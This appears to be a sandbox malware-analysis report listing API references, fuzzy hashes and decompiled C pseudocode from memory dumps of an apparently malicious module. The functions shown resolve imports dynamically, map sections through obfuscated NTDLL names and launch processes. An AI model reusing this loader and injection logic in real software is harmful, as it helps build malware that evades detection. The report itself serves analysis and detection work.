lstrcat.KERNEL32(00000000,00000000), ref: 02C82B46

Part of subcall function 02C86146: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,73BB81D0), ref: 02C861F8

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02C82B76
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C82B85
HeapFree.KERNEL32(00000000,00000000,?,050E95B0), ref: 02C82B94
HeapFree.KERNEL32(00000000,00000000), ref: 02C82BA6
HeapFree.KERNEL32(00000000,?), ref: 02C82BB5

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: cbe707eee2ead3079dc3382856c35d9ffae5e193379266d6f15c3de7502322f4
Instruction ID: 8047ac4978cfec4d8bb24c47ef29b27713d5d511d31efe40ac0787fcdc132b13
Opcode Fuzzy Hash: cbe707eee2ead3079dc3382856c35d9ffae5e193379266d6f15c3de7502322f4
Instruction Fuzzy Hash: 2061F531980201AFC715AB74EC48F5A77E8EF48358F058A15F90AC71A0D735DE25DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BAA10, Relevance: 19.7, APIs: 13, Instructions: 172COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 6D4BAA47
_strncmp.LIBCMT ref: 6D4BAA69
_strncmp.LIBCMT ref: 6D4BAA8B

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: _strncmp
String ID:
API String ID: 909875538-0
Opcode ID: 28f332509c3e04bda6981ab401a97c0a5d9544d532eab3747795b76b7c01a00b
Instruction ID: 430f00357fa3eb22fd6cf0ca8863f2b2d75dafbe10528a4b03d5accf5d5a5d0b
Opcode Fuzzy Hash: 28f332509c3e04bda6981ab401a97c0a5d9544d532eab3747795b76b7c01a00b
Instruction Fuzzy Hash: 1541D4EAB4961232D110AA1BBD03F5BA711AFF0796F048036FA15D6241E3B19D69C6F3

Uniqueness

Uniqueness Score: -1.00%

Function 02C8AD95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E02C8AD95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2c80000;
				_t115 = _t139[3] + 0x2c80000;
				_t131 = _t139[4] + 0x2c80000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2c80000;
				_v16 = _t139[5] + 0x2c80000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2c80002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2c8d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2c8d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2c8d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2c8d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2c8d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2c8d198; // 0x0
										 *_t102 = _t125;
										 *0x2c8d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2c8d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02c8ada4
0x02c8adba
0x02c8adc0
0x02c8adc2
0x02c8adc7
0x02c8adcd
0x02c8add2
0x02c8add5
0x02c8ade3
0x02c8adea
0x02c8aded
0x02c8adf0
0x02c8adf1
0x02c8adf4
0x02c8adf7
0x02c8adfa
0x02c8adff
0x02c8ae0e
0x00000000
0x02c8ae14
0x02c8ae1e
0x02c8ae28
0x02c8ae2d
0x02c8ae2f
0x02c8ae39
0x02c8ae3c
0x02c8ae3f
0x02c8ae45
0x02c8ae47
0x02c8ae47
0x02c8ae4a
0x02c8ae4d
0x02c8ae52
0x02c8ae56
0x02c8ae69
0x02c8ae6b
0x02c8af13
0x02c8af13
0x02c8af1a
0x02c8af1d
0x02c8af27
0x02c8af27
0x02c8af2b
0x02c8afa9
0x02c8afac
0x02c8afae
0x02c8afae
0x02c8afb5
0x02c8afb7
0x02c8afc1
0x02c8afc4
0x02c8afc7
0x02c8afc7
0x00000000
0x02c8af2d
0x02c8af30
0x02c8af5e
0x02c8af68
0x02c8af6c
0x02c8af74
0x02c8af77
0x02c8af7e
0x02c8af88
0x02c8af88
0x02c8af8c
0x02c8af91
0x02c8afa0
0x02c8afa6
0x02c8afa6
0x02c8af8c
0x00000000
0x02c8af37
0x02c8af3a
0x02c8af42
0x02c8af57
0x02c8af5c
0x00000000
0x00000000
0x02c8af5c
0x00000000
0x02c8af42
0x02c8af30
0x02c8af2b
0x02c8ae71
0x02c8ae78
0x02c8ae88
0x02c8ae91
0x02c8ae95
0x02c8aed8
0x02c8aee4
0x02c8af0d
0x02c8aee6
0x02c8aeea
0x02c8aef0
0x02c8aef8
0x02c8aefa
0x02c8aefd
0x02c8af03
0x02c8af05
0x02c8af05
0x02c8aef8
0x02c8aeea
0x00000000
0x02c8aee4
0x02c8ae9d
0x02c8aea0
0x02c8aea7
0x02c8aeb7
0x02c8aeba
0x02c8aeca
0x00000000
0x02c8aed0
0x02c8aeb1
0x02c8aeb5
0x00000000
0x00000000
0x00000000
0x02c8aeb5
0x02c8ae82
0x02c8ae86
0x00000000
0x00000000
0x00000000
0x02c8ae86
0x02c8ae5f
0x02c8ae63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02C8AE0E
LoadLibraryA.KERNEL32(?), ref: 02C8AE8B
GetLastError.KERNEL32 ref: 02C8AE97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02C8AECA

Strings

$, xrefs: 02C8ADE3

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 9088f10f382d89c4ce9774848c3f3cc150a0565c8d5372b528f4d22f089facc4
Instruction ID: c772df3587bf8760d93df06a558eb096639f789018a13883f32838e952db6ddb
Opcode Fuzzy Hash: 9088f10f382d89c4ce9774848c3f3cc150a0565c8d5372b528f4d22f089facc4
Instruction Fuzzy Hash: 988140B2A40605AFDB14DFA9D880BADB7F5FF88318F10C52AE505E7240E771EA15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02C84744, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E02C84744(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2c8d33c; // 0x50e9bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02C866E7(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2c8c1ac;
				}
				_t46 = E02C892DB(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02C87E20(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2c8d2a4; // 0x245a5a8
						_t16 = _t75 + 0x2c8eb28; // 0x530025
						 *0x2c8d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02C866E7(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2c8c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02C87E20(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02C8A5FA(_v20);
						} else {
							_t66 =  *0x2c8d2a4; // 0x245a5a8
							_t31 = _t66 + 0x2c8ec48; // 0x73006d
							 *0x2c8d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02C8A5FA(_v12);
				}
				return _v24;
			}

0x02c8474c
0x02c84752
0x02c84759
0x02c8475f
0x02c84763
0x02c84767
0x02c8476a
0x02c8476f
0x02c84774
0x02c84776
0x02c84776
0x02c8477f
0x02c84784
0x02c84789
0x02c8478f
0x02c84799
0x02c847a2
0x02c847a9
0x02c847c2
0x02c847c7
0x02c847cc
0x02c847d5
0x02c847de
0x02c847ef
0x02c847f8
0x02c847fc
0x02c84800
0x02c84805
0x02c8480a
0x02c8480c
0x02c8480c
0x02c84816
0x02c8481f
0x02c84826
0x02c8483e
0x02c84842
0x02c8487f
0x02c84844
0x02c84847
0x02c8484f
0x02c84860
0x02c8486c
0x02c84874
0x02c84878
0x02c84878
0x02c84842
0x02c84887
0x02c8488c
0x02c84893

APIs

GetTickCount.KERNEL32 ref: 02C84759
lstrlen.KERNEL32(?,80000002,00000005), ref: 02C84799
lstrlen.KERNEL32(00000000), ref: 02C847A2
lstrlen.KERNEL32(00000000), ref: 02C847A9
lstrlenW.KERNEL32(80000002), ref: 02C847B6
lstrlen.KERNEL32(?,00000004), ref: 02C84816
lstrlen.KERNEL32(?), ref: 02C8481F
lstrlen.KERNEL32(?), ref: 02C84826
lstrlenW.KERNEL32(?), ref: 02C8482D

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 95e3735c9b920cdf064d958868f2b49adde346ba8852481e1aa045aa604908ae
Instruction ID: 155a57d7e9f99315a46cbf331474cf27db634b7937d42942ddf989cba911b1cc
Opcode Fuzzy Hash: 95e3735c9b920cdf064d958868f2b49adde346ba8852481e1aa045aa604908ae
Instruction Fuzzy Hash: FA416A72D0021AEBCF11AFA4CC04A9EBBB5EF44358F118061EA05A7250DB35DB21EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C84EEC, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02C84EEC(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02C84896(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02C8A88E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2c8d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2c8d2a4; // 0x245a5a8
					_t18 = _t47 + 0x2c8e3e6; // 0x73797325
					_t68 = E02C8903C(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2c8d2a4; // 0x245a5a8
						_t19 = _t50 + 0x2c8e747; // 0x50e8cef
						_t20 = _t50 + 0x2c8e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02C89186();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02C89186();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2c8d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02C8A5FA(_t70);
				goto L12;
			}

0x02c84ef4
0x02c84ef4
0x02c84f03
0x02c84f0a
0x02c84f0f
0x02c8501c
0x02c85023
0x02c85023
0x02c84f1e
0x02c84f26
0x02c84f29
0x02c84f2e
0x02c84f43
0x02c84f49
0x02c84f4a
0x02c84f4d
0x02c84f53
0x02c84f56
0x02c84f5b
0x02c84f63
0x02c84f6f
0x02c84f73
0x02c85003
0x02c84f79
0x02c84f79
0x02c84f7e
0x02c84f85
0x02c84f99
0x02c84f9d
0x02c84fec
0x02c84f9f
0x02c84fa0
0x02c84fa7
0x02c84fc0
0x02c84fc2
0x02c84fc6
0x02c84fcd
0x02c84fe7
0x02c84fcf
0x02c84fd8
0x02c84fdd
0x02c84fdd
0x02c84fcd
0x02c84ffb
0x02c84ffb
0x02c84f73
0x02c8500a
0x02c85013
0x02c85017
0x00000000

APIs

Part of subcall function 02C84896: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02C84F08,?,00000001,?,?,00000000,00000000), ref: 02C848BB
Part of subcall function 02C84896: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02C848DD
Part of subcall function 02C84896: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02C848F3
Part of subcall function 02C84896: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02C84909
Part of subcall function 02C84896: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02C8491F
Part of subcall function 02C84896: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02C84935

memset.NTDLL ref: 02C84F56

Part of subcall function 02C8903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02C85D90,63699BCE,02C84CBB,73797325), ref: 02C8904D
Part of subcall function 02C8903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02C89067

GetModuleHandleA.KERNEL32(4E52454B,050E8CEF,73797325), ref: 02C84F8C
GetProcAddress.KERNEL32(00000000), ref: 02C84F93
HeapFree.KERNEL32(00000000,00000000), ref: 02C84FFB

Part of subcall function 02C89186: GetProcAddress.KERNEL32(36776F57,02C867DC), ref: 02C891A1

CloseHandle.KERNEL32(00000000,00000001), ref: 02C84FD8
CloseHandle.KERNEL32(?), ref: 02C84FDD
GetLastError.KERNEL32(00000001), ref: 02C84FE1

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 6950b94355826677086c3364638d814b9f4e7316a0af7e53149d98de13a44675
Instruction ID: 2a513c1fea96bb33603629039fc1755326b024cb7e78998f55987f93de874c27
Opcode Fuzzy Hash: 6950b94355826677086c3364638d814b9f4e7316a0af7e53149d98de13a44675
Instruction Fuzzy Hash: 80313072C04219AFDB10BFA4DC88E9EBBBDEF48348F018566F606A7110D7719E45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C88840, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02C88840(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2c8d2a4; // 0x245a5a8
				_t1 = _t9 + 0x2c8e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02C82BC9(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02C87E20(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02C85FCE(_t34, _t41, _a8);
						E02C8A5FA(_t41);
						_t42 = E02C87D98(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02C8A5FA(_t36);
							_t36 = _t42;
						}
						_t43 = E02C87EBE(_t36, _t33);
						if(_t43 != 0) {
							E02C8A5FA(_t36);
							_t36 = _t43;
						}
					}
					E02C8A5FA(_t28);
				}
				return _t36;
			}

0x02c88840
0x02c88843
0x02c88844
0x02c8884c
0x02c88853
0x02c8885a
0x02c8885e
0x02c88864
0x02c8886b
0x02c88870
0x02c88882
0x02c88886
0x02c8888a
0x02c88890
0x02c88895
0x02c888a5
0x02c888a7
0x02c888be
0x02c888c2
0x02c888c5
0x02c888ca
0x02c888ca
0x02c888d3
0x02c888d7
0x02c888da
0x02c888df
0x02c888df
0x02c888d7
0x02c888e2
0x02c888e2
0x02c888ed

APIs

Part of subcall function 02C82BC9: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,02C8885A,253D7325,00000000,00000000,745EC740,?,?,02C82AF0,?), ref: 02C82C30
Part of subcall function 02C82BC9: sprintf.NTDLL ref: 02C82C51

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,02C82AF0,?,050E95B0), ref: 02C8886B
lstrlen.KERNEL32(?,?,?,02C82AF0,?,050E95B0), ref: 02C88873

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

strcpy.NTDLL ref: 02C8888A
lstrcat.KERNEL32(00000000,?), ref: 02C88895

Part of subcall function 02C85FCE: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02C888A4,00000000,?,?,?,02C82AF0,?,050E95B0), ref: 02C85FE5

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02C82AF0,?,050E95B0), ref: 02C888B2

Part of subcall function 02C87D98: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02C888BE,00000000,?,?,02C82AF0,?,050E95B0), ref: 02C87DA2
Part of subcall function 02C87D98: _snprintf.NTDLL ref: 02C87E00

Strings

=, xrefs: 02C888AC

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 2c8edc436a6f8ccc4bc501f341dfef30ee5692166d212c38f6aa20da97eb1172
Instruction ID: d8930bc917344ae89252b8cccec351ec37dc0bd262403d528c0f3f75993234ea
Opcode Fuzzy Hash: 2c8edc436a6f8ccc4bc501f341dfef30ee5692166d212c38f6aa20da97eb1172
Instruction Fuzzy Hash: 3D11C6379015297B461277B49C84C6F3B9E9F8976C316C126F6059B100DF34CE02ABF1

Uniqueness

Uniqueness Score: -1.00%

Function 02C81598, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02C815F2
SysAllocString.OLEAUT32(0070006F), ref: 02C81606
SysAllocString.OLEAUT32(00000000), ref: 02C81618
SysFreeString.OLEAUT32(00000000), ref: 02C81680
SysFreeString.OLEAUT32(00000000), ref: 02C8168F
SysFreeString.OLEAUT32(00000000), ref: 02C8169A

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f3623f8d2cf054a2e2af8c5eeaff5b14fbe87bb66a6472c8b31c8d9a51087b6f
Instruction ID: f0d08d64693885a8874d3ebd4b297a6773925d895de1dcaa1197eabed2c4abb5
Opcode Fuzzy Hash: f3623f8d2cf054a2e2af8c5eeaff5b14fbe87bb66a6472c8b31c8d9a51087b6f
Instruction Fuzzy Hash: 69415035D00609ABDB01EFF8D844A9EB7BAEF89314F188526E914EB150DB719A06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02C84896, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C84896(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02C87E20(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2c8d2a4; // 0x245a5a8
					_t1 = _t23 + 0x2c8e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2c8d2a4; // 0x245a5a8
					_t2 = _t26 + 0x2c8e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02C8A5FA(_t54);
					} else {
						_t30 =  *0x2c8d2a4; // 0x245a5a8
						_t5 = _t30 + 0x2c8e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2c8d2a4; // 0x245a5a8
							_t7 = _t33 + 0x2c8e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2c8d2a4; // 0x245a5a8
								_t9 = _t36 + 0x2c8e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2c8d2a4; // 0x245a5a8
									_t11 = _t39 + 0x2c8e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02C86582(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02c848a5
0x02c848a9
0x02c8496b
0x02c848af
0x02c848af
0x02c848b4
0x02c848c7
0x02c848c9
0x02c848ce
0x02c848d6
0x02c848dd
0x02c848df
0x02c848e4
0x02c84963
0x02c84964
0x02c848e6
0x02c848e6
0x02c848eb
0x02c848f3
0x02c848f5
0x02c848fa
0x00000000
0x02c848fc
0x02c848fc
0x02c84901
0x02c84909
0x02c8490b
0x02c84910
0x00000000
0x02c84912
0x02c84912
0x02c84917
0x02c8491f
0x02c84921
0x02c84926
0x00000000
0x02c84928
0x02c84928
0x02c8492d
0x02c84935
0x02c84937
0x02c8493c
0x00000000
0x02c8493e
0x02c84944
0x02c84949
0x02c84950
0x02c84955
0x02c8495a
0x00000000
0x02c8495c
0x02c8495f
0x02c8495f
0x02c8495a
0x02c8493c
0x02c84926
0x02c84910
0x02c848fa
0x02c848e4
0x02c84979

APIs

